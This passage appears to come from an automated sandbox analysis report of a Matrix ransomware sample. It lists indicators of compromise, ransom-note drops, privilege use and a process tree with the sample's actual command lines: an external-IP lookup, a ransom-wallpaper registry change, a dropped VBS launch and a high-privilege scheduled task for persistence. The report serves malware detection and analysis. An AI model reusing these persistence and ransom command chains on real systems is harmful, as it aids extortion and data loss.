(read-only) \??\M: BtmmyzQx64.exe File opened (read-only) \??\N: BtmmyzQx64.exe File opened (read-only) \??\P: BtmmyzQx64.exe File opened (read-only) \??\X: BtmmyzQx64.exe File opened (read-only) \??\Y: BtmmyzQx64.exe File opened (read-only) \??\S: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\G: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\F: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\E: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\F: BtmmyzQx64.exe File opened (read-only) \??\I: BtmmyzQx64.exe File opened (read-only) \??\O: BtmmyzQx64.exe File opened (read-only) \??\S: BtmmyzQx64.exe File opened (read-only) \??\T: BtmmyzQx64.exe File opened (read-only) \??\U: BtmmyzQx64.exe File opened (read-only) \??\X: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\N: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\L: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\J: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\I: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\B: BtmmyzQx64.exe File opened (read-only) \??\Z: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\V: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\T: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\W: BtmmyzQx64.exe File opened (read-only) \??\A: BtmmyzQx64.exe File opened (read-only) \??\Q: BtmmyzQx64.exe File opened (read-only) \??\W: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\H: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\H: BtmmyzQx64.exe File opened (read-only) \??\J: BtmmyzQx64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\j6Hp7VfA.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Microsoft Games\Solitaire\ja-JP\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\en-US\Hearts.exe.mui 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Melbourne 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ja_JP.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\ResumeGet.emz 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kiritimati 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Java\jre7\lib\jfr\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\LICENSE 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Minsk 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Nicosia 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\WidevineCdm\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Google\Chrome\Application\chrome_proxy.exe 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.security_8.1.14.v20131031.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_zh_CN.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Google\Chrome\Application\master_preferences 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayenne 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\access-bridge-64.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bogota 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Microsoft Games\Chess\ja-JP\Chess.exe.mui 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Microsoft Games\Minesweeper\fr-FR\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wake 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di_1.0.0.v20140328-2112.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Microsoft Games\FreeCell\it-IT\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-11 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-options.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_ja.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Darwin 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.properties.src 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santiago 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 696 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1912 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 268 powershell.exe 888 BtmmyzQx64.exe 888 BtmmyzQx64.exe 888 BtmmyzQx64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 888 BtmmyzQx64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 268 powershell.exe Token: SeDebugPrivilege 888 BtmmyzQx64.exe Token: SeLoadDriverPrivilege 888 BtmmyzQx64.exe Token: SeBackupPrivilege 976 vssvc.exe Token: SeRestorePrivilege 976 vssvc.exe Token: SeAuditPrivilege 976 vssvc.exe Token: SeTakeOwnershipPrivilege 1152 takeown.exe Token: SeTakeOwnershipPrivilege 1560 takeown.exe Token: SeTakeOwnershipPrivilege 1496 takeown.exe Token: SeTakeOwnershipPrivilege 432 takeown.exe Token: SeIncreaseQuotaPrivilege 1124 WMIC.exe Token: SeSecurityPrivilege 1124 WMIC.exe Token: SeTakeOwnershipPrivilege 1124 WMIC.exe Token: SeLoadDriverPrivilege 1124 WMIC.exe Token: SeSystemProfilePrivilege 1124 WMIC.exe Token: SeSystemtimePrivilege 1124 WMIC.exe Token: SeProfSingleProcessPrivilege 1124 WMIC.exe Token: SeIncBasePriorityPrivilege 1124 WMIC.exe Token: SeCreatePagefilePrivilege 1124 WMIC.exe Token: SeBackupPrivilege 1124 WMIC.exe Token: SeRestorePrivilege 1124 WMIC.exe Token: SeShutdownPrivilege 1124 WMIC.exe Token: SeDebugPrivilege 1124 WMIC.exe Token: SeSystemEnvironmentPrivilege 1124 WMIC.exe Token: SeRemoteShutdownPrivilege 1124 WMIC.exe Token: SeUndockPrivilege 1124 WMIC.exe Token: SeManageVolumePrivilege 1124 WMIC.exe Token: 33 1124 WMIC.exe Token: 34 1124 WMIC.exe Token: 35 1124 WMIC.exe Token: SeTakeOwnershipPrivilege 1712 takeown.exe Token: SeIncreaseQuotaPrivilege 1124 WMIC.exe Token: SeSecurityPrivilege 1124 WMIC.exe Token: SeTakeOwnershipPrivilege 1124 WMIC.exe Token: SeLoadDriverPrivilege 1124 WMIC.exe Token: SeSystemProfilePrivilege 1124 WMIC.exe Token: SeSystemtimePrivilege 1124 WMIC.exe Token: SeProfSingleProcessPrivilege 1124 WMIC.exe Token: SeIncBasePriorityPrivilege 1124 WMIC.exe Token: SeCreatePagefilePrivilege 1124 WMIC.exe Token: SeBackupPrivilege 1124 WMIC.exe Token: SeRestorePrivilege 1124 WMIC.exe Token: SeShutdownPrivilege 1124 WMIC.exe Token: SeDebugPrivilege 1124 WMIC.exe Token: SeSystemEnvironmentPrivilege 1124 WMIC.exe Token: SeRemoteShutdownPrivilege 1124 WMIC.exe Token: SeUndockPrivilege 1124 WMIC.exe Token: SeManageVolumePrivilege 1124 WMIC.exe Token: 33 1124 WMIC.exe Token: 34 1124 WMIC.exe Token: 35 1124 WMIC.exe Token: SeTakeOwnershipPrivilege 1076 takeown.exe Token: SeTakeOwnershipPrivilege 828 takeown.exe Token: SeTakeOwnershipPrivilege 1636 takeown.exe Token: SeTakeOwnershipPrivilege 1188 takeown.exe Token: SeTakeOwnershipPrivilege 980 takeown.exe Token: SeTakeOwnershipPrivilege 804 takeown.exe Token: SeTakeOwnershipPrivilege 972 takeown.exe Token: SeTakeOwnershipPrivilege 1560 takeown.exe Token: SeTakeOwnershipPrivilege 980 takeown.exe Token: SeTakeOwnershipPrivilege 212 takeown.exe Token: SeTakeOwnershipPrivilege 1636 takeown.exe Token: SeTakeOwnershipPrivilege 224 takeown.exe Token: SeTakeOwnershipPrivilege 1836 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1616 wrote to memory of 1124 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 28 PID 1616 wrote to memory of 1124 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 28 PID 1616 wrote to memory of 1124 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 28 PID 1616 wrote to memory of 1124 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 28 PID 1616 wrote to memory of 1164 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 30 PID 1616 wrote to memory of 1164 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 30 PID 1616 wrote to memory of 1164 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 30 PID 1616 wrote to memory of 1164 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 30 PID 1616 wrote to memory of 556 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 32 PID 1616 wrote to memory of 556 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 32 PID 1616 wrote to memory of 556 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 32 PID 1616 wrote to memory of 556 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 32 PID 556 wrote to memory of 268 556 cmd.exe 34 PID 556 wrote to memory of 268 556 cmd.exe 34 PID 556 wrote to memory of 268 556 cmd.exe 34 PID 556 wrote to memory of 268 556 cmd.exe 34 PID 1616 wrote to memory of 1392 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 35 PID 1616 wrote to memory of 1392 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 35 PID 1616 wrote to memory of 1392 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 35 PID 1616 wrote to memory of 1392 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 35 PID 1616 wrote to memory of 1620 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 36 PID 1616 wrote to memory of 1620 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 36 PID 1616 wrote to memory of 1620 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 36 PID 1616 wrote to memory of 1620 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 36 PID 1392 wrote to memory of 844 1392 cmd.exe 39 PID 1392 wrote to memory of 844 1392 cmd.exe 39 PID 1392 wrote to memory of 844 1392 cmd.exe 39 PID 1392 wrote to memory of 844 1392 cmd.exe 39 PID 1620 wrote to memory of 1556 1620 cmd.exe 40 PID 1620 wrote to memory of 1556 1620 cmd.exe 40 PID 1620 wrote to memory of 1556 1620 cmd.exe 40 PID 1620 wrote to memory of 1556 1620 cmd.exe 40 PID 1616 wrote to memory of 1804 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 41 PID 1616 wrote to memory of 1804 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 41 PID 1616 wrote to memory of 1804 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 41 PID 1616 wrote to memory of 1804 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 41 PID 1392 wrote to memory of 1156 1392 cmd.exe 43 PID 1392 wrote to memory of 1156 1392 cmd.exe 43 PID 1392 wrote to memory of 1156 1392 cmd.exe 43 PID 1392 wrote to memory of 1156 1392 cmd.exe 43 PID 1392 wrote to memory of 1572 1392 cmd.exe 44 PID 1392 wrote to memory of 1572 1392 cmd.exe 44 PID 1392 wrote to memory of 1572 1392 cmd.exe 44 PID 1392 wrote to memory of 1572 1392 cmd.exe 44 PID 1804 wrote to memory of 1104 1804 cmd.exe 45 PID 1804 wrote to memory of 1104 1804 cmd.exe 45 PID 1804 wrote to memory of 1104 1804 cmd.exe 45 PID 1804 wrote to memory of 1104 1804 cmd.exe 45 PID 1804 wrote to memory of 392 1804 cmd.exe 46 PID 1804 wrote to memory of 392 1804 cmd.exe 46 PID 1804 wrote to memory of 392 1804 cmd.exe 46 PID 1804 wrote to memory of 392 1804 cmd.exe 46 PID 1556 wrote to memory of 1988 1556 wscript.exe 47 PID 1556 wrote to memory of 1988 1556 wscript.exe 47 PID 1556 wrote to memory of 1988 1556 wscript.exe 47 PID 1556 wrote to memory of 1988 1556 wscript.exe 47 PID 1988 wrote to memory of 696 1988 cmd.exe 50 PID 1988 wrote to memory of 696 1988 cmd.exe 50 PID 1988 wrote to memory of 696 1988 cmd.exe 50 PID 1988 wrote to memory of 696 1988 cmd.exe 50 PID 1804 wrote to memory of 364 1804 cmd.exe 51 PID 1804 wrote to memory of 364 1804 cmd.exe 51 PID 1804 wrote to memory of 364 1804 cmd.exe 51 PID 1804 wrote to memory of 364 1804 cmd.exe 51
Processes
-
C:\Users\Admin\AppData\Local\Temp\3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe"C:\Users\Admin\AppData\Local\Temp\3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe" "C:\Users\Admin\AppData\Local\Temp\NWqzv3Ha.exe"2⤵PID:1124
-
-
C:\Users\Admin\AppData\Local\Temp\NWqzv3Ha.exe"C:\Users\Admin\AppData\Local\Temp\NWqzv3Ha.exe" -n2⤵
- Executes dropped EXE
PID:1164
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\MNY4If5r.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\j6Hp7VfA.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\j6Hp7VfA.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:844
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:1156
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\npuVJjXg.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\npuVJjXg.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\TXwnHQzY.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\TXwnHQzY.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:696
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:628
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:960
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:1804 -
